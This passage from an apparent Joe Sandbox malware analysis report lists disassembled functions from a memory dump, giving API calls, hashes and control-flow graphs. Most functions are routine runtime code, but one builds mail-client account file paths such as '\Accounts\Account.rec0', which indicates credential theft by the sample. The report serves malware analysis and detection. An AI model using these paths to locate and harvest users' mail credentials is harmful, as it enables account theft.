                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                    • String ID:
                    • API String ID: 1454806937-0
                    • Opcode ID: 22c8f4b5b8eeae8bd2fda4f7bb6f165240bb3f56e2a18ef075c9c9bb11c4d675
                    • Instruction ID: 1ea26676ddecd6b9669ea40d3d0f866bded529d842402722af366d82b925bbc7
                    • Opcode Fuzzy Hash: 22c8f4b5b8eeae8bd2fda4f7bb6f165240bb3f56e2a18ef075c9c9bb11c4d675
                    • Instruction Fuzzy Hash: 1D2160B198531CBFE711EBA99D8CEEB77ACEB18354F0009A5FA01D2144E6749E468B70
                    Function 22799492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 380 22799492-227994ef GetConsoleCP 381 22799632-22799644 call 22792ada 380->381 382 227994f5-22799511 380->382 383 2279952c-2279953d call 22797c19 382->383 384 22799513-2279952a 382->384 391 2279953f-22799542 383->391 392 22799563-22799565 383->392 386 22799566-22799575 call 227979e6 384->386 386->381 394 2279957b-2279959b WideCharToMultiByte 386->394 395 22799609-22799628 391->395 396 22799548-2279955a call 227979e6 391->396 392->386 394->381 397 227995a1-227995b7 WriteFile 394->397 395->381 396->381 403 22799560-22799561 396->403 399 227995b9-227995ca 397->399 400 2279962a-22799630 GetLastError 397->400 399->381 402 227995cc-227995d0 399->402 400->381 404 227995fe-22799601 402->404 405 227995d2-227995f0 WriteFile 402->405 403->394 404->382 407 22799607 404->407 405->400 406 227995f2-227995f6 405->406 406->381 408 227995f8-227995fb 406->408 407->381 408->404
                    APIs
                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,22799C07,?,00000000,?,00000000,00000000), ref: 227994D4
                    • __fassign.LIBCMT ref: 2279954F
                    • __fassign.LIBCMT ref: 2279956A
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 22799590
                    • WriteFile.KERNEL32(?,?,00000000,22799C07,00000000,?,?,?,?,?,?,?,?,?,22799C07,?), ref: 227995AF
                    • WriteFile.KERNEL32(?,?,00000001,22799C07,00000000,?,?,?,?,?,?,?,?,?,22799C07,?), ref: 227995E8
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                    • String ID:
                    • API String ID: 1324828854-0
                    • Opcode ID: 034bae5e74fba94c709e600864aecb2cbc65fbd1c35ccbbeae4df554c69cb99b
                    • Instruction ID: 7f33a59f105a48f7482f9b33b22cbf02e4945ae93f222469a1054de2ad2dcdf4
                    • Opcode Fuzzy Hash: 034bae5e74fba94c709e600864aecb2cbc65fbd1c35ccbbeae4df554c69cb99b
                    • Instruction Fuzzy Hash: 9F51D5B1D08349EFDB10CFA8D895AEEBBF9EF09310F14451AE951E7281E730A941CB60
                    Function 22793370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 409 22793370-227933b5 call 22793330 call 227937a7 414 227933b7-227933c9 409->414 415 22793416-22793419 409->415 416 22793439-22793442 414->416 418 227933cb 414->418 415->416 417 2279341b-22793428 call 22793790 415->417 421 2279342d-22793436 call 22793330 417->421 420 227933d0-227933e7 418->420 422 227933e9-227933f7 call 22793740 420->422 423 227933fd 420->423 421->416 430 227933f9 422->430 431 2279340d-22793414 422->431 424 22793400-22793405 423->424 424->420 428 22793407-22793409 424->428 428->416 432 2279340b 428->432 433 227933fb 430->433 434 22793443-2279344c 430->434 431->421 432->421 433->424 435 2279344e-22793455 434->435 436 22793486-22793496 call 22793774 434->436 435->436 437 22793457-22793466 call 2279bbe0 435->437 442 22793498-227934a7 call 22793790 436->442 443 227934aa-227934c6 call 22793330 call 22793758 436->443 445 22793468-22793480 437->445 446 22793483 437->446 442->443 445->446 446->436
                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 2279339B
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 227933A3
                    • _ValidateLocalCookies.LIBCMT ref: 22793431
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 2279345C
                    • _ValidateLocalCookies.LIBCMT ref: 227934B1
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: csm
                    • API String ID: 1170836740-1018135373
                    • Opcode ID: 6feb49d3acf954a44a0087c3be7b44c2f510ba9c176a398a884e103b29fd81f6
                    • Instruction ID: 9e3dd6d02633968f91d11c64ae1a69f6205b5a3d5fe2338c6b3a8a26d32b8500
                    • Opcode Fuzzy Hash: 6feb49d3acf954a44a0087c3be7b44c2f510ba9c176a398a884e103b29fd81f6
                    • Instruction Fuzzy Hash: 5741EA34E08309ABCF01CF68E884A9EBBF5BF45328F118155E915AF361D735DA15CB91
                    Function 2279925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 22799221: _free.LIBCMT ref: 2279924A
                    • _free.LIBCMT ref: 227992AB
                      • Part of subcall function 2279571E: HeapFree.KERNEL32(00000000,00000000,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?), ref: 22795734
                      • Part of subcall function 2279571E: GetLastError.KERNEL32(?,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?,?), ref: 22795746
                    • _free.LIBCMT ref: 227992B6
                    • _free.LIBCMT ref: 227992C1
                    • _free.LIBCMT ref: 22799315
                    • _free.LIBCMT ref: 22799320
                    • _free.LIBCMT ref: 2279932B
                    • _free.LIBCMT ref: 22799336
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                    • Instruction ID: e7a0fe081b3269957de2bd0eae9c0aa4326b27620534e9d6850e20bbd7802521
                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                    • Instruction Fuzzy Hash: 53115E71548B18FAEA32EBB0EC49FCF7B9DAF24700F400825A699B7092DA65B6448751
                    Function 22798821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 491 22798821-2279883a 492 2279883c-2279884c call 22799341 491->492 493 22798850-22798855 491->493 492->493 500 2279884e 492->500 495 22798862-22798886 MultiByteToWideChar 493->495 496 22798857-2279885f 493->496 498 22798a19-22798a2c call 22792ada 495->498 499 2279888c-22798898 495->499 496->495 501 2279889a-227988ab 499->501 502 227988ec 499->502 500->493 505 227988ca-227988db call 227956d0 501->505 506 227988ad-227988bc call 2279bf20 501->506 504 227988ee-227988f0 502->504 509 22798a0e 504->509 510 227988f6-22798909 MultiByteToWideChar 504->510 505->509 516 227988e1 505->516 506->509 519 227988c2-227988c8 506->519 514 22798a10-22798a17 call 22798801 509->514 510->509 513 2279890f-2279892a call 22795f19 510->513 513->509 523 22798930-22798937 513->523 514->498 520 227988e7-227988ea 516->520 519->520 520->504 524 22798939-2279893e 523->524 525 22798971-2279897d 523->525 524->514 528 22798944-22798946 524->528 526 227989c9 525->526 527 2279897f-22798990 525->527 531 227989cb-227989cd 526->531 529 227989ab-227989bc call 227956d0 527->529 530 22798992-227989a1 call 2279bf20 527->530 528->509 532 2279894c-22798966 call 22795f19 528->532 536 22798a07-22798a0d call 22798801 529->536 547 227989be 529->547 530->536 545 227989a3-227989a9 530->545 535 227989cf-227989e8 call 22795f19 531->535 531->536 532->514 544 2279896c 532->544 535->536 548 227989ea-227989f1 535->548 536->509 544->509 549 227989c4-227989c7 545->549 547->549 550 22798a2d-22798a33 548->550 551 227989f3-227989f4 548->551 549->531 552 227989f5-22798a05 WideCharToMultiByte 550->552 551->552 552->536 553 22798a35-22798a3c call 22798801 552->553 553->514
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,22796FFD,00000000,?,?,?,22798A72,?,?,00000100), ref: 2279887B
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,22798A72,?,?,00000100,5EFC4D8B,?,?), ref: 22798901
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 227989FB
                    • __freea.LIBCMT ref: 22798A08
                      • Part of subcall function 227956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22795702
                    • __freea.LIBCMT ref: 22798A11
                    • __freea.LIBCMT ref: 22798A36
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                    • String ID:
                    • API String ID: 1414292761-0
                    • Opcode ID: a55d5637c2bd60f60d4c4d17276e6231ac4b168abe0b3852f032aad2f85f0e33
                    • Instruction ID: 5436d9c7e3333d6931070447f15fc740472ff7275c50ff0575e8e96bd45d9208
                    • Opcode Fuzzy Hash: a55d5637c2bd60f60d4c4d17276e6231ac4b168abe0b3852f032aad2f85f0e33
                    • Instruction Fuzzy Hash: 50511372618316AFEB158F74ED45FAB37AAEB41764F900629FD04E7140EB34DC50C6A4
                    Function 227915DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                    Download Yara Rule
                    APIs
                    • _strlen.LIBCMT ref: 22791607
                    • _strcat.LIBCMT ref: 2279161D
                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2279190E,?,?,00000000,?,00000000), ref: 22791643
                    • lstrcatW.KERNEL32(?,?), ref: 2279165A
                    • lstrlenW.KERNEL32(?,?,?,?,?,2279190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 22791661
                    • lstrcatW.KERNEL32(00001008,?), ref: 22791686
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: lstrcatlstrlen$_strcat_strlen
                    • String ID:
                    • API String ID: 1922816806-0
                    • Opcode ID: bb9ff8f62d7e7442188624fecddca8e3dff643da2ee2926617ac96d5912d0e6d
                    • Instruction ID: fe82f5fab30a0b3ad4ff13efaf2be7c570fca55926bf74243ca2f4e688c376f7
                    • Opcode Fuzzy Hash: bb9ff8f62d7e7442188624fecddca8e3dff643da2ee2926617ac96d5912d0e6d
                    • Instruction Fuzzy Hash: 0521DA36904304ABD705DB54EC84EFE77B8EF89720F24446AE904EB151DF34A542C7A5
                    Function 22791000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrcatW.KERNEL32(?,?), ref: 22791038
                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2279104B
                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 22791061
                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 22791075
                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 22791090
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 227910B8
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$AttributesFilelstrcat
                    • String ID:
                    • API String ID: 3594823470-0
                    • Opcode ID: 2dc26dc0e181aabcfc723ec3f51267d9eb9d30b3433881f59273a2da59af1b6e
                    • Instruction ID: b2b55a38a90ac89c20f5b9204f5fe84492a33e2cf39f11c156f9ccd5d260b40e
                    • Opcode Fuzzy Hash: 2dc26dc0e181aabcfc723ec3f51267d9eb9d30b3433881f59273a2da59af1b6e
                    • Instruction Fuzzy Hash: 16219F3590431CABCF10DA68ED4CEDB3778EF44314F108696E959A31A1DA719AA6CB40
                    Function 22793856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,22793518,227923F1,22791F17), ref: 22793864
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 22793872
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2279388B
                    • SetLastError.KERNEL32(00000000,?,22793518,227923F1,22791F17), ref: 227938DD
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: c5b93face57115a87864705fc4fc2f8c94f5e7345a0acd20e76f8ceebd4d39fa
                    • Instruction ID: 5cc4b711446bd2aa902f6c2882b5ebcbe13a1a232f8548427c393be6531d3fd6
                    • Opcode Fuzzy Hash: c5b93face57115a87864705fc4fc2f8c94f5e7345a0acd20e76f8ceebd4d39fa
                    • Instruction Fuzzy Hash: 0201FC33A4D7116DE2022BB97D8BE1B6796DB15774B200339FA209F1D5FF2548018360
                    Function 22795AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,22796C6C), ref: 22795AFA
                    • _free.LIBCMT ref: 22795B2D
                    • _free.LIBCMT ref: 22795B55
                    • SetLastError.KERNEL32(00000000,?,?,22796C6C), ref: 22795B62
                    • SetLastError.KERNEL32(00000000,?,?,22796C6C), ref: 22795B6E
                    • _abort.LIBCMT ref: 22795B74
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: ErrorLast$_free$_abort
                    • String ID:
                    • API String ID: 3160817290-0
                    • Opcode ID: ddc8988d1863fa1dee81757d10c1a6697752f19ffdeb71d03a957f5955788916
                    • Instruction ID: c8695856ed413ed15a706fcf3eae90f2cd322b74ff82690670fa341caf47fcbf
                    • Opcode Fuzzy Hash: ddc8988d1863fa1dee81757d10c1a6697752f19ffdeb71d03a957f5955788916
                    • Instruction Fuzzy Hash: 32F0C8B254DB31AAD20367347D4DF1F2A6B9FE1771F240624FD14A7285FE3585034164
                    Function 227911EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 22791E89: lstrlenW.KERNEL32(?,?,?,?,?,227910DF,?,?,?,00000000), ref: 22791E9A
                      • Part of subcall function 22791E89: lstrcatW.KERNEL32(?,?), ref: 22791EAC
                      • Part of subcall function 22791E89: lstrlenW.KERNEL32(?,?,227910DF,?,?,?,00000000), ref: 22791EB3
                      • Part of subcall function 22791E89: lstrlenW.KERNEL32(?,?,227910DF,?,?,?,00000000), ref: 22791EC8
                      • Part of subcall function 22791E89: lstrcatW.KERNEL32(?,227910DF), ref: 22791ED3
                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2279122A
                      • Part of subcall function 2279173A: _strlen.LIBCMT ref: 22791855
                      • Part of subcall function 2279173A: _strlen.LIBCMT ref: 22791869
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                    • API String ID: 4036392271-1520055953
                    • Opcode ID: e75f65e0b5f418ac2abbe98922266e5b12243386a0bbb3d6b9eadd7c1b45dd9b
                    • Instruction ID: a89c8ef11a383cc46dc9b69064da2275b9d99c0090b3cd16c57af6f3ae5f7c75
                    • Opcode Fuzzy Hash: e75f65e0b5f418ac2abbe98922266e5b12243386a0bbb3d6b9eadd7c1b45dd9b
                    • Instruction Fuzzy Hash: FF21E479E183086AEB1097E4ECD1FEE7339EF90715F000556F604EB1E0E6B11E818759
                    Function 22794B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,22794AEA,?,?,22794A8A,?,227A2238,0000000C,22794BBD,00000000,00000000), ref: 22794B59
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 22794B6C
                    • FreeLibrary.KERNEL32(00000000,?,?,?,22794AEA,?,?,22794A8A,?,227A2238,0000000C,22794BBD,00000000,00000000,00000001,22792082), ref: 22794B8F
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: efd27d46b2cc6f78f16ae0bcc6331228a9a76ce27b913a2f2104e955a8591dfe
                    • Instruction ID: c28d587b75da0c2d62581454b18dec6fabcba5e85081ec3598a4d1bc8c3c1365
                    • Opcode Fuzzy Hash: efd27d46b2cc6f78f16ae0bcc6331228a9a76ce27b913a2f2104e955a8591dfe
                    • Instruction Fuzzy Hash: 7FF04F35A48308BBDB11AF94D919F9EBFB9EF04365F004168FD09A6254DB35A942CA90
                    Function 22797153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 2279715C
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2279717F
                      • Part of subcall function 227956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22795702
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 227971A5
                    • _free.LIBCMT ref: 227971B8
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 227971C7
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                    • String ID:
                    • API String ID: 336800556-0
                    • Opcode ID: 35805d030dd6098f66f1283867c57c7d6f43f25bb02d15faaccb6351baaed85f
                    • Instruction ID: 9c7107427dd88f9ec78f92deb11c8dea1ab2b77c812b96bffca60589915475b3
                    • Opcode Fuzzy Hash: 35805d030dd6098f66f1283867c57c7d6f43f25bb02d15faaccb6351baaed85f
                    • Instruction Fuzzy Hash: 4601FCB264D3157F27111ABA6C8CDBB2A6DDEC2A643140929BD04C720CDE749C0285B0
                    Function 22795B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000000,2279636D,22795713,00000000,?,22792249,?,?,22791D66,00000000,?,?,00000000), ref: 22795B7F
                    • _free.LIBCMT ref: 22795BB4
                    • _free.LIBCMT ref: 22795BDB
                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22795BE8
                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22795BF1
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: ErrorLast$_free
                    • String ID:
                    • API String ID: 3170660625-0
                    • Opcode ID: b40ee9d97e48521891651ccbb55544257392b5b4685a8f3a076b7e90dd92328b
                    • Instruction ID: 9f3f9320fc5dc1709d467410284ced2a2e1603323391648403c33dd2f4aac3fd
                    • Opcode Fuzzy Hash: b40ee9d97e48521891651ccbb55544257392b5b4685a8f3a076b7e90dd92328b
                    • Instruction Fuzzy Hash: 1E014CB214D731ABD20376387D89E1F2A6E9FC1770F500224FD16A7241EF39C9034164
                    Function 22791E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,?,?,227910DF,?,?,?,00000000), ref: 22791E9A
                    • lstrcatW.KERNEL32(?,?), ref: 22791EAC
                    • lstrlenW.KERNEL32(?,?,227910DF,?,?,?,00000000), ref: 22791EB3
                    • lstrlenW.KERNEL32(?,?,227910DF,?,?,?,00000000), ref: 22791EC8
                    • lstrcatW.KERNEL32(?,227910DF), ref: 22791ED3
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$lstrcat
                    • String ID:
                    • API String ID: 493641738-0
                    • Opcode ID: 167d404e38dbc213891d7b335ca3be4f482e7ad597f2bb8f0648951f48cd057d
                    • Instruction ID: 31c8dc3c5fd5f169d04945cc41b5a766de87e2e6564671aa0bfea15c010ba479
                    • Opcode Fuzzy Hash: 167d404e38dbc213891d7b335ca3be4f482e7ad597f2bb8f0648951f48cd057d
                    • Instruction Fuzzy Hash: 36F05E361453107AD721372AED85EBF7B7CEF86A61F040419FA0C83190DBA8685293A5
                    Function 227991B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 227991D0
                      • Part of subcall function 2279571E: HeapFree.KERNEL32(00000000,00000000,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?), ref: 22795734
                      • Part of subcall function 2279571E: GetLastError.KERNEL32(?,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?,?), ref: 22795746
                    • _free.LIBCMT ref: 227991E2
                    • _free.LIBCMT ref: 227991F4
                    • _free.LIBCMT ref: 22799206
                    • _free.LIBCMT ref: 22799218
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 8c7368071c932c8e8c7b014193361025f765560f811140da766bb8ce2fa1bd5f
                    • Instruction ID: 9fb715ff3629c7b90f952ecdddd44e165bb3f9c18a41dcc1f065820859a6e5d9
                    • Opcode Fuzzy Hash: 8c7368071c932c8e8c7b014193361025f765560f811140da766bb8ce2fa1bd5f
                    • Instruction Fuzzy Hash: A3F0FF7155C351D79635DE54FAC9C167BEAFB20724B500C05E909DF504CA39F9808B50
                    Function 22795351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 2279536F
                      • Part of subcall function 2279571E: HeapFree.KERNEL32(00000000,00000000,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?), ref: 22795734
                      • Part of subcall function 2279571E: GetLastError.KERNEL32(?,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?,?), ref: 22795746
                    • _free.LIBCMT ref: 22795381
                    • _free.LIBCMT ref: 22795394
                    • _free.LIBCMT ref: 227953A5
                    • _free.LIBCMT ref: 227953B6
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 186e8cedf31b8dbf7790a66b5396474148538314b883a5351c8f7e1e9f4a9eaf
                    • Instruction ID: dc93c61430e883a62b1af9113d3901e72c21f5b294954998473e910decd01400
                    • Opcode Fuzzy Hash: 186e8cedf31b8dbf7790a66b5396474148538314b883a5351c8f7e1e9f4a9eaf
                    • Instruction Fuzzy Hash: 05F0DA708AD335DB86129F38E9944087BB3F7267357110E1AFC10AB258DB3A4A429F80
                    Function 22794BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                    Download Yara Rule
                    APIs
